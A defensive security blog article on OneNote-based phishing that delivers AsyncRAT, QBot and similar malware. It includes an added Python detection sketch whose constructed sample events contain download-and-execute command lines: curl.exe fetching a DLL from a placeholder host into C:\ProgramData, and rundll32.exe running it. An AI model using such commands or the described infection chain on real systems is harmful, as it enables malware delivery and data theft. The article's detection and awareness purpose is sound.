March 21, 2023 By Doug Bonderud 4 min read

There are plenty of phish in the digital sea, and attackers are constantly looking for new bait that helps them bypass security perimeters and land in user inboxes.

Their newest hook? OneNote documents. First noticed in December 2022, this phishing framework has seen success in fooling multiple antivirus (AV) tools by using .one file extensions, and January 2023 saw an attack uptick as compromises continued.

While this novel notes approach will eventually be phased out as phishing defenses catch up, current conditions make it worthwhile to understand how this attack works, what it means for organizations and what they can do to stay safe.

From many to .One — the impact of macro-economics

In July 2022, Microsoft disabled macros by default in all Office document types. Despite a temporary rollback in response to user concerns, auto-blocking of macros is now standard operating practice. While users can enable them after the fact, malicious actors can no longer rely on macros to make their phishing efforts easier.

In response to this change, attackers went looking for a new approach and found it in OneNote documents. For cyber criminals, the benefits of OneNote are two-fold. The first is novelty: Businesses aren’t expecting attacks in .one files. Next is efficacy: As noted by ZDNET, multiple AV tools did not flag OneNote attachments as malicious, even when they contained malware payloads.

How OneNote malware works

The first OneNote attacks were discovered in December 2022 as attackers experimented with new phishing methods. As of February 2023, more than 60 attacks were confirmed on companies in the manufacturing, industrial and education sectors.

Common payloads attached to malicious documents include AsyncRAT, AgentTesla, Doubleback and Redline. Malicious actors also created a mix of specific and general compromise campaigns. In the case of industrial and manufacturing firms, attachments appeared to be documents containing details about machine parts or specifications. Educational institutions were on the receiving end of more widespread campaigns that included fictitious invoices or offers of Christmas bonuses.

Despite the new file format, OneNote phishing attacks play out much like their more familiar counterparts. Victims must open the email message, open the attachment and then click through on malicious links. While OneNote does warn users about the risk of suspicious document links, this doesn’t always have the intended effect. Consider that 45% of all alerts are false positives and that one-third of IOT security staff ignore alerts if their queue is already full. Given that even security professionals don’t always investigate potential problems because they’re too busy or perceived threats may simply be common errors, it’s hardly surprising that front-line staff feel confident clicking through to OneNote documents despite system warnings.

Once inside a company’s network, malicious payloads delivered by OneNote documents can find, collect and exfiltrate sensitive data, including usernames, passwords and protected files.

Duck, duck, lose

Efforts are also underway to expand the impact of OneNote attacks by bundling documents with the QBot malware payload. Originally a banking trojan discovered in 2007, QBot — also called QakBot — has evolved into an initial access framework. As part of a phishing campaign, it takes on the task of gaining initial device access, in turn enabling attackers to load and execute additional malware payloads.

As noted by SC Magazine, a cyber crime group known as TA577 has leveraged QBot-based attacks to gain system access, then steal and sell collected data to other cyber criminals. Known as QakNote, this new attack approach has quickly gained ground. Since early February, attackers have pressed their advantage to hook as many phish as possible before the pond dries up.

In practice, QBot attacks start with an embedded HTML application (HTA) that retrieves QBot when users click on malicious links. Then, an HTA script uses the curl.exe application to download a DLL file that contains QBot. This file is placed in the C:\ProgramData folder and executed using Rundll32.exe. Finally, the payload injects itself into the Windows Assistive Technology file — AtBroker.exe — to conceal itself from security tools.
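A defender-side detection sketch for the delivery chain just described, added here as an example and not part of the original article: it scans constructed process-creation events (the field names, sample paths and export name are assumptions, not real telemetry) and flags OneNote spawning a script host, curl.exe writing into C:\ProgramData, and rundll32.exe loading a DLL from that folder.

```python
"""Flag the OneNote -> HTA -> curl.exe -> rundll32.exe chain in process-creation events.
All events below are constructed for this example; the schema is an assumption."""
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the newly created process
    cmdline: str  # full command line of the new process

PROGRAMDATA = re.compile(r"c:\\programdata\\", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}

def classify(ev: ProcEvent) -> List[str]:
    """Return the chain stages a single event matches (empty list means no match)."""
    hits = []
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    # Stage 1: OneNote launching a script host (the embedded HTA being opened)
    if parent == "onenote.exe" and image in SCRIPT_HOSTS:
        hits.append("onenote_spawns_script_host")
    # Stage 2: curl.exe told to write its download into C:\ProgramData
    if image == "curl.exe" and PROGRAMDATA.search(cmd) and ("-o" in cmd.split() or "--output" in cmd):
        hits.append("curl_download_to_programdata")
    # Stage 3: rundll32.exe executing a DLL that lives under C:\ProgramData
    if image == "rundll32.exe" and PROGRAMDATA.search(cmd):
        hits.append("rundll32_from_programdata")
    return hits

# Constructed sample events: one benign curl download at the end acts as a control.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "onenote.exe", r'"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE" "invoice.one"'),
    ProcEvent("onenote.exe", "mshta.exe", r"mshta.exe C:\Users\a\AppData\Local\Temp\OneNote\open.hta"),
    ProcEvent("mshta.exe", "curl.exe", r"curl.exe -o C:\ProgramData\update.dll http://placeholder.invalid/x"),
    ProcEvent("mshta.exe", "rundll32.exe", r"rundll32.exe C:\ProgramData\update.dll,EntryPoint"),
    ProcEvent("explorer.exe", "curl.exe", r"curl.exe -o C:\Users\a\Downloads\tool.zip https://placeholder.invalid/tool.zip"),
]

def detect_chain(events: List[ProcEvent]) -> Tuple[List[str], bool]:
    """Aggregate stage hits for one host; alert when two or more distinct stages are present,
    so a lone curl.exe or rundll32.exe use does not page anyone on its own."""
    stages = {hit for ev in events for hit in classify(ev)}
    return sorted(stages), len(stages) >= 2
```

In a real deployment the same three rules map onto Sysmon Event ID 1 or EDR process-creation fields, and the aggregation would be keyed by host and time window.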

Foiling the phish

Recognizing OneNote issues is the first step in reducing risk. But what else can companies do to limit the chance of compromise?

Thankfully, the novel nature of the note attack doesn’t change the overall security strategy. First, companies need to implement robust spam filters to keep the bulk of potentially problematic emails out of user inboxes. This approach works well because it doesn’t just emphasize detecting the malicious nature of OneNote documents. Rather, it focuses on identifying messages as spam, which is often a more straightforward task.

Next is cybersecurity education which focuses on secure computing habits. While this includes reminders to heed security warnings, it’s also critical for companies to offer more proactive advice that helps staff spot phishing efforts more easily. As social engineering efforts become more in-depth, this education is shifting away from more generic recommendations such as seeking out grammar or spelling errors. Instead, it takes a more considered approach that focuses on questions. Common questions for staff include: Why am I receiving this email? Do I know the sender? Was I asking for these documents? What action are they asking me to take? It’s also worth running regular phishing exercises to see if staff can spot security risks before they click through.

Slow and steady

Lastly, enterprises need to prioritize the value of slowing down when it comes to improving security. This is because company culture often prioritizes speed. Staff want to meet deadlines and avoid setbacks on current projects, meaning that potential security threats may be sidelined in favor of keeping tasks on track. To address this, IT teams need to seek out C-suite support for policies that require staff to report potential problems and make it clear that this reporting takes priority over other tasks. It’s also worth implementing a system that allows staff to quickly flag emails for IT review.

Bottom line? Security teams need to take note and take action. The shift away from macro-based malware may have closed one digital door, but it opened a window for new phishing frameworks.
